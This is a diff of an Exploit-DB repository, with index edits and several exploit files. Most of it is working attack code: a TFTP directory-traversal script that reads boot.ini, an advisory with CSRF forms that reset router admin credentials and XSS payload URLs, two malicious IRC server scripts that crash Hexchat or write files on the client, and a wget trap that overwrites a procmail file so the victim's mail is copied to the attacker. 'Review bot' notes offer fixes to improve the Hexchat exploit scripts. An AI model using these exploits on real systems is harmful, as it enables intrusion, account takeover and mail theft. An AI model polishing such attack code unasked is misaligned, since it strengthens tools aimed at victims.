28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0
@ -33334,7 +33334,7 @@ id,file,description,date,author,platform,type,port
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@ -33952,7 +33952,7 @@ id,file,description,date,author,platform,type,port
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
@ -34172,7 +34172,7 @@ id,file,description,date,author,platform,type,port
37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@ -34548,7 +34548,7 @@ id,file,description,date,author,platform,type,port
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0
38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
@ -35879,3 +35879,7 @@ id,file,description,date,author,platform,type,port
39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0



@ -13,6 +13,8 @@ Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Paper: https://www.exploit-db.com/docs/39658.pdf
Summary:
--------


@ -1,105 +1,8 @@
##############################################################################
Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability
Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
Vendor : http://www.avaya.com/usa/product/ip-office
Advisory : http://www.avaya.com/usa/product/ip-office
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
Version : Avaya IP Office Manager TFTP Server Version 8.1
Date : 08/07/2011
###############################################################################
SecPod ID: 1017 25/05/2011 Issue Discovered
31/05/2011 Vendor Notified
No Response from the Vendor
08/07/2011 Advisory Released
Class: Information Disclosure Severity: Medium
Overview:
---------
Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory
Traversal vulnerability.
Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
Parameter containing '../' sequences, which allows attackers to read
arbitrary files via directory traversal attacks.
Impact:
--------
Successful exploitation could allow an attacker to to obtain sensitive
information, which can lead to launching further attacks.
Affected Software:
------------------
Avaya IP Office Manager TFTP Server Version 8.1
Tested on:
-----------
Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3.
References:
-----------
http://secpod.org/blog/?p=225
http://www.avaya.com/usa/product/ip-office
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
Proof of Concept:
----------------
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
Solution:
----------
Not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
CVSS Temporal Score = 4.5
Risk factor = Medium
Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.
SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py:
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=3D225
# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Exploit : http://secpod.com/blog/?p=225
# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
@ -111,13 +14,13 @@ def sendPacket(HOST, PORT, data):
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
'''
udp_sock =3D socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data =3D udp_sock.recv(1024)
data = udp_sock.recv(1024)
udp_sock.close()
return data
if __name__ =3D=3D "__main__":
if __name__ == "__main__":
if len(sys.argv) < 2:
print "\tUsage: python exploit.py target_ip"
@ -125,13 +28,13 @@ if __name__ =3D=3D "__main__":
print "\tExiting..."
sys.exit(0)
HOST =3D sys.argv[1] =09=09=09## The Server IP
PORT =3D 69 =09=09=09## Default TFTP port
HOST = sys.argv[1] ## The Server IP
PORT = 69 ## Default TFTP port
data =3D "\x00\x01" =09=09=09## TFTP Read Request
data +=3D "../" * 10 + "boot.ini" + "\x00"=09## Read boot.ini file using directory traversal
data +=3D "octet\x00"=09=09=09=09## TFTP Type
data = "\x00\x01" ## TFTP Read Request
data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal
data += "octet\x00" ## TFTP Type
rec_data =3D sendPacket(HOST, PORT, data)
rec_data = sendPacket(HOST, PORT, data)
print "Data Found on the target : %s " %(HOST)
print rec_data.strip()


@ -0,0 +1,231 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs
magicword: d0ubl3th1nk1ng...
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Adivisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html
Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL
background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provide a excellent wireless expreience for
everyone.
I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits a page bellow, this will set the administrative credential
for PQI Air Pen express to "root:r00t"
<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The attacker can also abuse of the multiple XSS in this device to exploit
this vulnerability, something like this to set the same cred 'root:r00t'
http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--
The following poc will set the credential to access point to "3groot:3g00t"
(and of course, any other value could be set in this way.)
<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="staticGateway"
value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticPriDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="staticSecDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe&#95;user" />
<input type="hidden" name="pppoePass" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoePass2" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp&#95;server" />
<input type="hidden" name="l2tpUser" value="l2tp&#95;user" />
<input type="hidden" name="l2tpPass" value="l2tp&#95;passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="l2tpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="l2tpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp&#95;server" />
<input type="hidden" name="pptpUser" value="pptp&#95;user" />
<input type="hidden" name="pptpPass" value="pptp&#95;passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="pptpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="pptpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> < -- 3G
User
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G
Password
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
"Webs URL Filter Settings"
# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add
Request in this page will show a pop-up with a content of javascript
payload:
http://{airpenXweb}/firewall/content_filtering.asp
# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add
III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since it is not carried out any validation of the data provided by the
user.
Bellow are some examples:
"Basic Wireless Settings"
# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1
# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]
IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all credentials available via direct request to
/cgi-bin/ExportSettings.sh.
PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh
V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the Vendor's site) it is very clear that the
priority is to
facilitate everything for you, including setting. Therefore it is not
mandatory that a password
is configured for the web interface and not to connect to the AP, this way
you can find hundreds
of these completely unprotected APs.
VI. No SSL
``````````````````
Any action, whether sensitive or not is transmitted in plain text because
HTTPS is not used and no step.
POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
admuser=ORWL_user&admpass=ORWL_pass
Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered
and forms site contacts as well.

74
platforms/multiple/dos/39657.py Executable file

@ -0,0 +1,74 @@
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]
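Review bot: The accepted connection `conn` is never closed — the try block ends with `sock.close()` on the listening socket only, and on the error path neither handle is closed, so both leak until interpreter exit; `conn.recv(256)` also has no timeout, so the script blocks indefinitely if the client sends nothing after the CAP LS line. Moving the close calls into a `finally:` block (`conn.close()` before `sock.close()`, guarded for the case where `accept` never returned) and calling `conn.settimeout(...)` right after `accept` would address both. The `except socket.error as msg` handler indexes `msg[0]` and `msg[1]`, which only works when the error carries an (errno, message) pair; `str(msg)` is safe for every socket.error. The same pattern appears in 39656.py in the section below. `sys` and `time` are imported but unused in both files.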


@ -0,0 +1,93 @@
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087
#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)
In this function, channame (channel name) and netname (network name as
configured in the client software) are sanitized to prevent directory
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into
the file path via the 'log_insert_vars' function call.
This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead
of the default = '%n\%c.log').
When connecting to a malicious server, Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are accessible easily :
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = '../PIZZA'
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1]
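Review bot: The handler's message `'Failure binding to port : '` mislabels most of the errors it can receive, because the single `except socket.error` covers `accept`, `send` and `recv` as well as `bind`, so a reset connection or a failed send is reported as a bind failure. The sibling PoC 39657.py uses the neutral `print 'Network error : ' + str(msg)` for the identical block, and the same wording fits here. A comment on the `SERVERNAME = '../PIZZA'` line noting that the value is the server-name prefix of the 001 reply, which the client inserts unsanitized into the `%s` log-path pattern, would make the trigger condition clear without reading the docstring.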


@ -1,8 +1,8 @@
#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm)
# License: Public Domain - SECU
# Copyright 2004 Jan Min???? (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
@ -12,20 +12,20 @@
use POSIX qw(strftime);
# This is our scheme/host/port
$server =3D "http://localhost:31340";
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server =3D "http://..";
#$server = "http://..";
# Wanna know who got infected?=20
#$log =3D "/dev/pts/1";
# Wanna know who got infected?
#$log = "/dev/pts/1";
# The filename we will try to overwrite on the target system
$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
############### Payload #########################################
$email =3D 'your@mailbox';
$password =3D 'Pmrpuf ner cevzvgvirf';
$payload =3D <<EOP;
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
@ -37,36 +37,36 @@ chomp $payload;
############### Payload #########################################
# A simple directory traversal, for greater effect
$trick =3D "/.." . "%2f.." x 40;
$trick = "/.." . "%2f.." x 40;
open LOG, ">$log" if $log;
while(<STDIN>){
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=3D\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
@ -78,9 +78,9 @@ Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
} else {
# Print the redirection
print <<EOT;
} else {
# Print the redirection
print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
@ -91,9 +91,7 @@ Content-Type: text/plain\r
\r
$payload
